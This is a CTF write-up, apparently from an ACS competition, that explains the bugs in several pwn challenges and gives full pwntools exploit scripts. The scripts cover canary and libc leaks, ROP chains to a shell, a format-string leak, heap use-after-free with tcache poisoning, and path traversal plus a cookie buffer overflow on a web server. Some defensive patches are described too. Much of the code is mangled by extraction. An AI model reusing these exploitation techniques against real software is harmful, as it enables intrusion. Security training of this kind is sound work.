This is write-up for challenges which I solved during the event.
You can find attachments (included unsolved challenges) here .
Quals round Unfortunally, I couldn’t solve any pwnable challenges because they are too hard but luckily there is a challenge in Audit catagory that I could solve it.
no-name minor A float variable stop incrementing at 16777216
First, I load $16777216$ and buy a name. I loan one by one, and my cash increases, but the debt doesn’t change.
After buying the name, we can call the loan 1$ 1337, repay all of the debt, and change the name.
Taking advantage of printing user name to leak canary and libc’s address.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 from pwn import *from time import sleepcontext.binary = e = ELF("prob_patched" ) libc = ELF("./" ) gs = """ brva 0x01889 """ def start (): if args.LOCAL: p = e.process() if args.GDB: gdb.attach(p, gdbscript=gs) pause() elif args.REMOTE: host_port = sys.argv[1 :] p = remote(host_port[0 ], int (host_port[1 ])) return p p = start() def loan (num ): p.sendline(b'1' ) p.sendline( str (num).encode()) def repay (num ): p.sendlineafter(b"Choose an action." , b'2' ) p.sendlineafter(b'How much would you like to repay?\n' , str (num).encode()) def mininig (): p.sendlineafter(b"Choose an action." , b'3' ) p.sendlineafter(b'Enter mining work :' , b'A' *4 ) def buyName (): p.sendlineafter(b"Choose an action." , b'4' ) def reName (name ): p.sendlineafter(b"Choose an action." , b'5' ) p.sendafter(b"Enter new name.\n" , name) loan(0x1000000 ) buyName() for i in range (1337 ): loan(1 ) repay(0x1000000 ) reName(b'A' *0x2c +b'B' ) p.recvuntil(b"B" ) canary = u64(b'\0' +p.recv(7 )) log.success(hex (canary)) reName(b'A' *0x2c +b'B' *0x10 ) p.recvuntil(b"B" *0x10 ) libc.address = u64(p.recv(6 )+b'\0\0' ) - (libc.sym.__libc_start_call_main+128 ) reName(b'A' *0x2c +p64(canary)+b'B' *0x8 + p64(libc.address+0x000000000002a3e5 ) + p64(next ('/bin/sh' ))) + p64(libc.address+0x000000000002a3e6 ) + p64(libc.sym.system) ) p.sendlineafter(b"Choose an action." , b'6' ) p.interactive()
*Note: there is one challenge that I have exploit script but couldn’t pass the timeout on remote.
Final round There are two types in this round.
First is the defense type. You have to exploit the binary as normal but also try to patch the bug to prevent attacks from the bot. The bot attacks one time per 15 minutes.
Second, is the jeopardy one. No need to patch but they are still so hard.
We can’t solve any jeopardy challenges but we did solve all defense challenges.
Oreo Actually, I didn’t solve this challenge. My teammate @thecrabsterchief solved this.
The challenge has some functions like this
Bug 1: Format String at error_log
function, which is called at parsing
1 2 3 4 5 6 7 8 9 unsigned __int64 __fastcall error_log (const char *a1) { unsigned __int64 v2; v2 = __readfsqword(0x28 u); printf ("[ERROR] " ); printf (a1); return v2 - __readfsqword(0x28 u); }
⇒ How to trigger, set operation first, then choose oreo
Bug 2: Buffer overflow on mine
⇒ The scanf read until byte “\n” → overflow buffer quiz on bss, then copy to bufer dest on the stack.
Exploit chains:
Use bug format string to leak base binary address and canary
Use bug Buffer overflow to overwrite return address of mine
function to secret
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 """ ============================ Import ============================ """ from pwn import *from pwn import p32, u32, p64, u64import sys""" ============================ Import ============================ """ libc = ELF("./" , checksec=False ) context.binary = elf = ELF("./oreo_patched" ) gs=""" brva 0x1762 brva 0x14F9 """ def start (argv=[], *a, **kw ): if args.GDB: return gdb.debug(["./oreo_patched" ] + argv, gdbscript=gs, *a, **kw) elif args.REMOTE: return remote(sys.argv[1 ], int (sys.argv[2 ]), *a, **kw) else : return process(["./oreo_patched" ] + argv, *a, **kw) def operation (op: bytes ): io.sendlineafter(b"> " , b"1" ) io.sendlineafter(b": " , op) def oreo (): io.sendlineafter(b"> " , b"2" ) io.recvuntil(b"[ERROR] " ) return io.recvline().split(b"==========menu==========" )[0 ] def mine (buf: bytes ): io.sendlineafter(b"> " , b"3" ) io.sendlineafter(b": " , buf) if __name__ == "__main__" : io = start() operation(b"%11$p" ) elf.address = int (oreo(), 16 ) - 0x168f info("Leak pie: " + hex (elf.address)) operation(b"%9$p" ) canary = int (oreo(), 16 ) info("Leak canary: " + hex (canary)) mine(p64(canary+1 )*5 + p64(elf.sym["secret" ])) mine(b"a" *24 ) mine(b"quit" ) io.interactive()
Patching Plan:
Format String bug, just patch the constant fmt:
1 2 3 4 5 6 7 8 unsigned __int64 __fastcall error_log (const char *a1) { unsigned __int64 v2; v2 = __readfsqword(0x28 u); printf ("[ERROR] %s" , a1); return v2 - __readfsqword(0x28 u); }
Buffer overflow, just patch the length size when copying from bss to stack:
1 2 3 4 __isoc99_scanf("%[^\n]%*c" , quiz); len_quiz = strlen ((const char *)&answer[2 * r]); strncpy (dest, (const char *)&answer[2 * r], 0x08 );dest[len_quiz] = 0 ;
ezdb After reversing the binary, I guess some name functions of it:
1 2 3 4 5 6 7 8 9 10 11 12 struct Str { int id; char *s; }; struct Hold { int ref; int cout ; Str *sList; };
The global variable at the address 0x04051E0
is a Hold
pointer, it manages 7 Str
When we call del
it will call delStr
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 int __fastcall delStr (unsigned int a1) { Str *pStr; unsigned __int64 v3; v3 = __readfsqword(0x28 u); if ( (int )sub_401BE1() < 0 ) return -4 ; if ( getStr(a1, &pStr) == -5 ) return -5 ; free (pStr->s); pStr->id = -1 ; if ( ptr->ref ) --ptr->ref; return 0 ; }
We can see that it calls free(pStr->s)
but doesn’t clear the pointer which can lead to double free or user after free.
The function change
call reEdit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 int __fastcall reEdit (unsigned int sIdx, int id, const void *buf, size_t size) { Str *v7; char *v8; if ( sIdx >= ptr->cout ) return -5 ; if ( id < 0 ) return -5 ; v7 = &ptr->sList[sIdx]; v7->id = id; if ( v7->s ) free (v7->s); v8 = (char *)malloc (size + 1 ); if ( !v8 ) return -6 ; v7->s = v8; memcpy (v7->s, buf, size); v7->s[size] = 0 ; return 0 ; }
It frees the old pointer free(v7->s)
and allocates new memory, but the bug is that maybe v7->s
was deleted when calling del
before that.
1 2 3 4 5 6 7 8 9 10 11 12 add([(0 , 0x20 , b'0' *0x20 )]) add([(1 , 0x20 , b'1' *0x20 )]) add([(2 , 0x600 , b'2' *0x600 )]) delete(2 ) delete(0 ) buf = b'0' *(0x100 -0x10 )+p64(0 )+p64(0x31 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) edit(2 , 2 , 0x68 , b'_' *0x68 )
First, I create three chunks and the last one is an extremely big chunk. When I free chuck2, it will be merged to top_chunk. That means when I take advantage of the bug to free it again, I can free something that is not chuck2 itself.
Calculating offset, I will make the old chunk2 pointer inside chunk0 and its fake size is 0x30.
Now it is easier because 0x30-chunk is inside chunk0. We can free 0x30-chunk and corrupt the tcache link-list.
1 2 3 4 5 6 7 8 9 10 11 buf = b'0' *(0x70 )+p64(0 )+p64(0x31 ) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) l = add([(1 , 0x20 , b'T' *0x20 )]) delete(l) buf = b'0' *(0x70 )+p64(0 )+p64(0x31 )+p64(0 )+p64(0 ) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) edit(l, l, 0x38 , b'_' *0x38 )
Clear the fd so that we can double free 0x30-chunk without making the process abort.
We can see the Str list here, just tcache poisoning to change a Str
object point to a got
pointer so we can leak libc, and after that, tcache poisoning again to overwrite __free_hook
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 from pwn import *from time import sleepcontext.binary = e = ELF("ezdb_patched" ) libc = e.libc gs = """ ida_connect # b add # b del # b reEdit b *0x040171A b system """ def start (): if args.LOCAL: p = e.process() elif args.REMOTE: host_port = sys.argv[1 :] p = remote(host_port[0 ], int (host_port[1 ])) return p p = start() def add (bufList: list ): ret = [] p.sendafter(b">" , b'\x01' ) p.send(p32(len (bufList))) for s_ in bufList: p.send(p32(s_[0 ])+p32(s_[1 ])+s_[2 ]) ret.append(u32(p.recv(4 ))) p.send(b'\n' ) return ret[0 ] def edit (idx, newid, size, buf ): p.sendafter(b">" , b'\x02' ) p.send( p32(idx) + p32(newid) + p32(size) + buf ) _ = p.recv(4 ) p.send(b'\n' ) return u32(_) def show (idx ): p.sendafter(b">" , b'\x04' ) p.send( p32(idx) ) p.send(b'\n' ) def delete (idx ): p.sendafter(b">" , b'\x05' ) p.send( p32(idx) ) p.send(b'\n' ) add([(0 , 0x20 , b'0' *0x20 )]) add([(1 , 0x20 , b'1' *0x20 )]) add([(2 , 0x600 , b'2' *0x600 )]) delete(2 ) delete(0 ) buf = b'0' *(0x100 -0x10 )+p64(0 )+p64(0x31 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) edit(2 , 2 , 0x68 , b'_' *0x68 ) buf = b'0' *(0x70 )+p64(0 )+p64(0x31 ) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) l = add([(1 , 0x20 , b'T' *0x20 )]) delete(l) buf = b'0' *(0x70 )+p64(0 )+p64(0x31 )+p64(0 )+p64(0 ) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) edit(l, l, 0x38 , b'_' *0x38 ) if args.GDB: gdb.attach(p, gdbscript=gs) pause() lmao = add([(1 , 0x20 , b'T' *0x20 )]) hehe = add([(1 , 0x20 , b'T' *0x20 )]) delete(lmao) delete(1 ) show(hehe) p.recvuntil(b'T' *8 ) heap = u32(p.recv(4 ))-0x10 log.success(hex (heap)) add([(1 , 0x20 , b'1' *0x20 )]) buf = b'0' *(0x20 )+p64(0 )+p64(0x31 ) + p64(heap+0x320 ) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) edit(2 , 2 , 0x20 , b'_' *0x20 ) edit(3 , 3 , 0x20 , p64(6 )+p64( )*2 ) show(6 ) p.recv(8 ) libc.address = u64(p.recv(6 )+b'\0\0' ) - log.success(hex (libc.address)) delete(1 ) delete(hehe) buf = b'0' *(0x20 )+p64(0 )+p64(0x31 ) + p64(libc.sym.__free_hook) delete(0 ) add([(0 , 0x500 , buf.ljust(0x500 , b'\0' ))]) add([(1 , 0x20 , b'sh\0' .ljust(0x20 ))]) add([(1 , 0x20 , p64(libc.sym.system)+p64(0 )*3 )]) delete(1 ) p.interactive()
Sadly we have no more time ( during the competition time ) for patching the binary.
CS1337 The first bug is buffer-overflow via cookie buffer
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 read(*a1, v13, 0x400 uLL); src = strstr (v13, "Cookie: id=" ); if ( src ){ src = (char *)src + 11 ; for ( i = src; *i != 10 ; ++i ) ; if ( i ) v18 = (_WORD)i - (_WORD)src - 1 ; memcpy (cookie, src, v18); cookie[v18] = 0 ; } if ( (unsigned int )get_posts_size() == 10 ) remove_all_posts(); if ( strstr (v13, "GET /login.html" ) || strstr (v13, "GET /signup.html" ) || strstr (v13, "POST /signup" ) || strstr (v13, "POST /login" ) || (unsigned int )is_valid_cookie(cookie) )
The second one is path traversal.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 int __fastcall send_file (int a1, char *path) { size_t v2; size_t v4; const char *mime_type; size_t v6; int v7; size_t n; char v9[1032 ]; char *v10; FILE *stream; char *s; _BYTE ptr[1024 ]; char *haystack; int v15; v15 = a1; haystack = path; if ( strstr (path, "flag" ) ) { s = "HTTP/1.1 403 Forbidden\nContent-Type: text/plain\n\nForbidden" ; v2 = strlen ("HTTP/1.1 403 Forbidden\nContent-Type: text/plain\n\nForbidden" ); return write(v15, "HTTP/1.1 403 Forbidden\nContent-Type: text/plain\n\nForbidden" , v2); } else { stream = fopen(haystack, "rb" );
So we can take advantage of the second one to leak the address ( by reading /proc/self/maps ) and use the first one to ROP.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 from pwn import *from time import sleepimport requestscontext.binary = e = ELF("./cs1337_patched" ) libc = e.libc gs = """ brva 0x212D """ def start (): global HOST, PORT if args.LOCAL: p = e.process() HOST = 'localhost' PORT = 1338 elif args.REMOTE: host_port = sys.argv[1 :] p = remote(host_port[0 ], int (host_port[1 ])) HOST = host_port[0 ] PORT = host_port[1 ] return p p = start() sleep(1 ) if args.GDB: gdb.attach(p, gdbscript=gs) pause() io = remote(HOST, PORT) io.send(f"""GET /../../../../../../../../../../../../../../../../proc/self/maps HTTP/1.1 Content-Length: 0\r Cookie: id=pwn\r Connection: keep-alive\r \r\n""" .encode())io.recvuntil((b'HTTP/1.1 200 OK\n' b'Content-Type: text/plain\n' b'\n' )) e.address = int (io.recv(12 ).decode(), 16 ) while True : _ = io.recvline() if b'' in _: break libc.address = int (_[:12 ].decode(), 16 ) (e.address)) (libc.address)) io.close() RDI_RET = libc.address+0x000000000002a3e5 RSI_RET = libc.address+0x000000000002be51 RDX_R12_RET = libc.address+0x000000000011f2e7 RAX_RET = libc.address+0x0000000000045eb0 qwordRDI_RAX_RET = libc.address+0x0000000000042e83 rop = p64(RDI_RET)+p64(e.address) + \ p64(RSI_RET)+p64(0xf000 ) + \ p64(RDX_R12_RET)+p64(7 )+p64(0 ) + \ p64(libc.sym.mprotect) + \ p64(RDI_RET)+p64( + \ p64(RAX_RET)+p64(libc.sym.popen) + \ p64(qwordRDI_RAX_RET) + \ p64(RDI_RET)+p64(e.address+0x33DF ) + \ p64(RAX_RET)+b'r' +b'\0' *7 + \ p64(qwordRDI_RAX_RET) + \ p64(RDI_RET)+p64(e.address+0x339F ) + \ p64(RAX_RET)+b'r' +b'\0' *7 + \ p64(qwordRDI_RAX_RET) + \ p64(RDI_RET)+p64(9999999 ) + \ p64(libc.sym.sleep) io = remote(HOST, PORT) io.send("""GET / HTTP/1.1 Content-Length: 0\r Cookie: id=""" .encode()+b'\0' *0x28 +rop+b'\r\n' )io.close() sleep(1 ) pause() io = remote(HOST, PORT) io.send("""GET /cat<flag_2f5b7b1cb601ee86b4ede919f94958fd HTTP/1.1 Content-Length: 0\r Cookie: id=pwn\r\n""" .encode())io.interactive() p.interactive()
Because the client interacts with the process through a socket running on a sub-thread, so we can’t just drop the shell. I use the ROP chain to patch the binary itself (”flag” → “r” to read the flag and strstr@got
→ popen
to know the flag file’s name).
My patch is checking the size before copy to the cookie buffer:
and also changed strstr(path, "flag")
to strstr(path, "/")
, the flag file’s name is random so a strict / character is better:
vote your favorite ctf! In the add
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 printf ("wanna upload photo? " );__isoc99_scanf(" %c" , &v14); if ( v14 == 121 || v14 == 89 ){ *(_BYTE *)(qword_82C0[v19] + 12LL ) = 1 ; printf ("width? " ); __isoc99_scanf("%hd" , &v15); printf ("height? " ); __isoc99_scanf("%hd" , &v16); getchar(); if ( v15 > 47 || v16 > 47 ) exit (-1 ); sub_347A(qword_82C0[v19], (unsigned int )v15); sub_349A(qword_82C0[v19], (unsigned int )v16); puts ("reading photo below>>" ); v4 = (void *)sub_3602(qword_82C0[v19]); memset (v4, 0 , 8uLL ); v5 = v15 * v16; v6 = (void *)sub_3602(qword_82C0[v19]); read(0 , v6, v5);
we see that v15 and v16 can be < 0 but v15*v16 will be a positive number , it’s big enough for heap overflow.
But there is a checksum function that maybe
detects the object is overwritten:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 __int64 __fastcall sub_34BA (__int64 a1) { __int16 i; __int64 v3; v3 = 0x1337133713371337 LL; for ( i = 0 ; i < *(__int16 *)(a1 + 20 ) * *(__int16 *)(a1 + 22 ) && *(__int16 *)(a1 + 20 ) >= 0 && *(__int16 *)(a1 + 22 ) >= 0 && i <= 2303 ; ++i ) { v3 = 23 * v3 + *(char *)(a1 + i + 56 ); } return v3; }
I’m too lazy to analyze that function, when overwriting an object,
1 2 add(0 , b'A' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 ))
I set the breakpoint when it compares the return value and the sum:
the return value is 0x1337133713371337
so I just simply set the sum as 0x1337133713371337
So just overflowing the name to leak heap, pie address (through vtable of the object).
The std::string
object has 3 attributes: data, size and capacity. I just change the
to a GOT
pointer to leak the libc.
1 2 add(4 , b'@' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 )+p64(heap+0x14e50 ) + p64(heap+0x14e70 )*2 +p64(0x31 )+p64( )+p64(0 ))
Also changing it to environ
to leak the stack:
1 2 add(5 , b'#' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 )+p64(heap+0x157e0 ) + p64(heap+0x157e0 +0x20 )*2 +p64(0x31 )+p64(libc.sym.environ)+p64(0x8 )+p64(0 ))
For now, tcache poisoning to rop is a bit hard challenge.
I make the 0x90-tcache link-list point to a stack address, but when std::string allocator will delete it to reallocate a bigger chunk.
After debugging, I decided to overwrite std::basic_istream<char, std::char_traits<char> >& std::operator>><char, std::char_traits<char>, std::allocator<char> >(std::basic_istream<char, std::char_traits<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&)
‘s return address.
This function is the function that copies the input buffer to the string buffer. Its caller is going to delete the string buffer ( now the stack address ) after it returns.
Overwriting its return address will help us avoid to free stack address.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 from pwn import *from time import sleepcontext.binary = e = ELF("prob_patched" ) libc = ELF("./" ) gs = """ # brva 0x002A18 brva 0x35F6 """ def start (): if args.LOCAL: p = e.process() elif args.REMOTE: host_port = sys.argv[1 :] p = remote(host_port[0 ], int (host_port[1 ])) return p p = start() def add (idx, name, topic_cnt, topic: list , is_Photo=False , width=0 , height=0 , photoData=b'' , exploit=False ): p.sendlineafter(b"input:" , b"1" ) p.sendlineafter(b"idx? " , str (idx).encode()) p.sendlineafter(b"name? " , name) p.sendlineafter(b"topic cnt? " , str (topic_cnt).encode()) for i in range (topic_cnt): p.sendlineafter(b'topic> ' , topic[i]) if exploit: return p.recvuntil(b'wanna upload photo? ' ) if is_Photo and width and height: p.sendline(b'y' ) p.sendlineafter(b'width? ' , str (width).encode()) p.sendlineafter(b'height? ' , str (height).encode()) p.sendafter(b'reading photo below>>' , photoData) else : p.sendline(b'n' ) def show (): p.sendlineafter(b"input:" , b"2" ) def remove (idx ): p.sendlineafter(b"input:" , b"3" ) p.sendlineafter(b"idx? " , str (idx).encode()) add(0 , b'A' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(1 , b'B' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(2 , b'C' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(3 , b'D' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(4 , b'D' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(5 , b'5' *0x10 , 1 , [b'A' *0x80 ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) add(6 , b'6' *0x10 , 1 , [b'A' *0x80 ], is_Photo=True , width=47 , height=1 , photoData=b'X' *47 ) remove(0 ) add(0 , b'A' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 )) p.recvuntil(p64(0x1337133713371337 )*(0x908 //8 )) heap = u64(p.recv(6 )+b'\0\0' ) - 0x12810"heap: " +hex (heap)) remove(2 ) add(2 , b'A' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x958 //8 )) p.recvuntil(p64(0x1337133713371337 )*(0x958 //8 )) e.address = u64(p.recv(6 )+b'\0\0' ) - 0x7c80"pie: " + hex (e.address)) remove(4 ) add(4 , b'@' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 )+p64(heap+0x14e50 ) + p64(heap+0x14e70 )*2 +p64(0x31 )+p64( )+p64(0 )) show() p.recvuntil(b'@' *0x10 ) p.recvuntil(b'(topic list)\n' ) libc.address = u64(p.recv(8 )) - libc.sym.printf"libc @ " + hex (libc.address)) p.sendline(b"1" ) remove(5 ) addr = heap+0x14eb8 pl = p64(libc.address+0xebcf5 )*3 pl = pl.ljust(0x920 ) add(5 , b'#' *0x10 , 1 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=p64(0x1337133713371337 )*(0x908 //8 )+p64(heap+0x157e0 ) + p64(heap+0x157e0 +0x20 )*2 +p64(0x31 )+p64(libc.sym.environ)+p64(0x8 )+p64(0 )) show() p.recvuntil(b'(################ logo)\n' ) p.recvuntil(b'(topic list)\n' ) stack = u64(p.recv(8 ))"stack : " + hex (stack)) p.sendline(b'1' ) remove(6 ) return_addr = stack - 0x1d0 target_chunk = heap + 0x16380 _ = b'\0' *0x20 +p64(next ('/bin/sh' ))) + \ b'\0' *0x100 + p64(heap+0x15a48 ) _ = _.ljust(0x918 , b'\0' ) add(6 , b'#' *0x10 , 0 , [b'AAAAA' ], is_Photo=True , width=65280 , height=65280 , photoData=_ + p64(0 ) + p64(0x31 ) + p64((heap+0x16350 ) >> 12 ) + p64(0 )*4 +p64(0x91 ) + p64((target_chunk >> 12 ) ^ (return_addr - 0x28 ))) if args.GDB: gdb.attach(p, gdbscript=gs) pause() add(7 , b'7' *0x10 , 1 , [b'A' *0x80 ]) rop = p64(heap+0x15a48 +0x50 )*5 + p64(libc.address+0x000000000002be51 ) + p64(0 ) + \ p64(libc.address+0x0000000000149ac9 ) + p64(libc.address+0xebcf8 ) rop = rop.ljust(0x50 , b'A' ) add(8 , b'8' *0x10 , 1 , [rop], exploit=True ) p.sendline(b"cat flag" ) p.interactive()
Just changing weight and height to unsigned, we can avoid that bug:
Epilogue: ACS PWN challenges are so good and so hard.
Thank @Pwn9uin and @d0now for creating good challenges.